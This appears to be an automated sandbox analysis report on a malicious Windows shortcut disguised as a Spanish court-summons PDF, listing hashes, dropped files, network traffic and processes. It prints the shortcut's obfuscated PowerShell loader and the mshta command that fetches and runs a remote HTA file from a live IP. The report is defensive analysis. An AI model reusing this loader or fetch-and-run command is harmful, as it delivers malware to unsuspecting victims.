                                                                                        SSDEEP:3:illlKYe1pdkhVGuAJkhvekl179QI//allrekGltll/SPj:il/Kz1pdkbrxlqJe3l
                                                                                        MD5:F4C6CE7215603DF9297BBB3089194236
                                                                                        SHA1:D6080FA0E431211719ED34A4C2432D7D0045C485
                                                                                        SHA-256:749A76AD418E3FF109C20A0056C83B0D7A0060F537EB9459BBEB6178E191A0E1
                                                                                        SHA-512:07F0B8B0C25FF7A057BBD18FA3C0D5C451ED25257C3BD5F752DDD121A7B76E71AC652C7E5E772DB8ECADE688B045BE14BEF666278D88DEBEF33B07310E4103C9
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:...@.....................................;...{..'....|.......{...............{.......{...XL......{.................. .&.'....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:NlllulnsiXz:NllUsiX
                                                                                        MD5:D664BA2397F45C07CD21EF138C1A4E97
                                                                                        SHA1:7D74C67DB2C0D62FF3BCAFF13D0F102E94550D30
                                                                                        SHA-256:1C8181B5C6A049E968ECC6F0CDD6F0962A49AEDC6198892A09B15111900A5151
                                                                                        SHA-512:5066F8E7285593B4ECBC4B0889C05B7CC71D3FFDA0C1E6CFF1548D04381AD9745034AB2CB0E16D2541EDF1030A4F838BE02C91C3CABCCB949161A4007D724ABC
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@...e...................................3............@..........

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cn0cqse.ejj.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cibrx2n2.yuc.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRVNTY32EM2YMY4GGXOO.temp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5449
                                                                                        Entropy (8bit):3.5171436605508384
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:jAI/RYJXdLXuHAkHfwAMAlz3SogZodi/EHfwAMAlI3SogZodiT1:jA/XuNHIAMAkHai8HIAMAxHai5
                                                                                        MD5:B9752A6EEA90D57197D76810DACF653A
                                                                                        SHA1:40A7A8AD90EF5F79EF170B24F5A5F713CD01F459
                                                                                        SHA-256:E02BDB275FF8224409EC9BA359E8DB27CE099CA066F943CCE36103F31B2338CB
                                                                                        SHA-512:E2813BB7997F8D01ABBF8959B9FFB2C2B9266F23FE756CAD2770E1529AAFA65EAB4D9F1657BBABAEE49A0B26E665712E03676A30E410987D9FC0743E6BA226B6
                                                                                        Malicious:false
                                                                                        Preview:...................................FL..................F.`.. .....r.....j.+....M..*....n............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........t.....j.+........2.n...NY.H .DEMAND~1.LNK..r......DW"rNY.H...........................9..D.E.M.A.N.D.A. .J.U.I.C.I.O. .J.U.Z.G.A.D.O.0.1...p.d.f...l.n.k.......g...............-.......f..............o.....C:\Users\user\Desktop\DEMANDA JUICIO JUZGADO01.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..........................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c40edd991180589a.customDestinations-ms (copy)

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5449
                                                                                        Entropy (8bit):3.5171436605508384
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:jAI/RYJXdLXuHAkHfwAMAlz3SogZodi/EHfwAMAlI3SogZodiT1:jA/XuNHIAMAkHai8HIAMAxHai5
                                                                                        MD5:B9752A6EEA90D57197D76810DACF653A
                                                                                        SHA1:40A7A8AD90EF5F79EF170B24F5A5F713CD01F459
                                                                                        SHA-256:E02BDB275FF8224409EC9BA359E8DB27CE099CA066F943CCE36103F31B2338CB
                                                                                        SHA-512:E2813BB7997F8D01ABBF8959B9FFB2C2B9266F23FE756CAD2770E1529AAFA65EAB4D9F1657BBABAEE49A0B26E665712E03676A30E410987D9FC0743E6BA226B6
                                                                                        Malicious:false
                                                                                        Preview:...................................FL..................F.`.. .....r.....j.+....M..*....n............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........t.....j.+........2.n...NY.H .DEMAND~1.LNK..r......DW"rNY.H...........................9..D.E.M.A.N.D.A. .J.U.I.C.I.O. .J.U.Z.G.A.D.O.0.1...p.d.f...l.n.k.......g...............-.......f..............o.....C:\Users\user\Desktop\DEMANDA JUICIO JUZGADO01.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..........................................................

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                                                        Entropy (8bit):3.1314423393168074
                                                                                        TrID:
                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                        File name:DEMANDA JUICIO JUZGADO01.pdf.lnk
                                                                                        File size:3'182 bytes
                                                                                        MD5:06ce6c64dc6b0df8c484c55eafcaf2a8
                                                                                        SHA1:0b436093555e4e7f792c78a986b830954efbb964
                                                                                        SHA256:514cbb6ac8f92bbc548a0612d1bce1bf3cca5f3e70c0245ad1e1a72d7936e492
                                                                                        SHA512:4509324a9f4344291be495ba35e30a6df5cf65472302ed009dddc858db998a30699194508dc955a8f0d9393a3144f4f3160606e542f44eb83ab58ffd0d29f7e0
                                                                                        SSDEEP:48:8c5aOlcrPctPcbri+RxHJMdUV9Ji5dJ9v:8c5zlaPCSmeRJcSJi9B
                                                                                        TLSH:DA61443CEEA40636E2B5E635FDA59602F43A7B41B72E4E4D01D242C0512211FB4EDF2E
                                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                        File Icon

                                                                                        Icon Hash:74f4f4dcece9e9ed

                                                                                        Static Windows Shortcut Info

                                                                                        General

                                                                                        Relative Path:..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Command Line Argument:-ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.';&(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)]));^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)]));foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]};*% $i;
                                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-14T11:05:40.365769+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.54972694.154.172.16680TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 14, 2024 11:05:18.973525047 CEST4972680192.168.2.594.154.172.166
                                                                                        Oct 14, 2024 11:05:18.978552103 CEST804972694.154.172.166192.168.2.5
                                                                                        Oct 14, 2024 11:05:18.978658915 CEST4972680192.168.2.594.154.172.166
                                                                                        Oct 14, 2024 11:05:18.980227947 CEST4972680192.168.2.594.154.172.166
                                                                                        Oct 14, 2024 11:05:18.985157967 CEST804972694.154.172.166192.168.2.5
                                                                                        Oct 14, 2024 11:05:40.365681887 CEST804972694.154.172.166192.168.2.5
                                                                                        Oct 14, 2024 11:05:40.365768909 CEST4972680192.168.2.594.154.172.166
                                                                                        Oct 14, 2024 11:05:40.366520882 CEST4972680192.168.2.594.154.172.166
                                                                                        Oct 14, 2024 11:05:40.371345043 CEST804972694.154.172.166192.168.2.5

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 14, 2024 11:05:07.683607101 CEST1.1.1.1192.168.2.50x6207No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Oct 14, 2024 11:05:07.683607101 CEST1.1.1.1192.168.2.50x6207No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • 94.154.172.166

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.54972694.154.172.166807516C:\Windows\System32\mshta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 14, 2024 11:05:18.980227947 CEST334OUTGET /pczt/royyyas.hta HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-CH
                                                                                        UA-CPU: AMD64
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: 94.154.172.166
                                                                                        Connection: Keep-Alive


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:05:05:09
                                                                                        Start date:14/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:05:05:09
                                                                                        Start date:14/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:05:05:16
                                                                                        Start date:14/10/2024
                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta
                                                                                        Imagebase:0x7ff731290000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:05:05:39
                                                                                        Start date:14/10/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7e52b0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FF848A35275 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249016224.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff848a30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd3dffde184f875ebaf59330f9940a98e693c25f82a7719426720f99c10b2ced
                                                                                          • Instruction ID: 4e76b1af412d9c6383e18fb9cc06657b09ac6f9804b76d3709888ad3e860e55f
                                                                                          • Opcode Fuzzy Hash: cd3dffde184f875ebaf59330f9940a98e693c25f82a7719426720f99c10b2ced
                                                                                          • Instruction Fuzzy Hash: 3F01843010CB084FDB48EF0CE051AA9B7E0FB85364F10052EE58AC3651D722E881CB46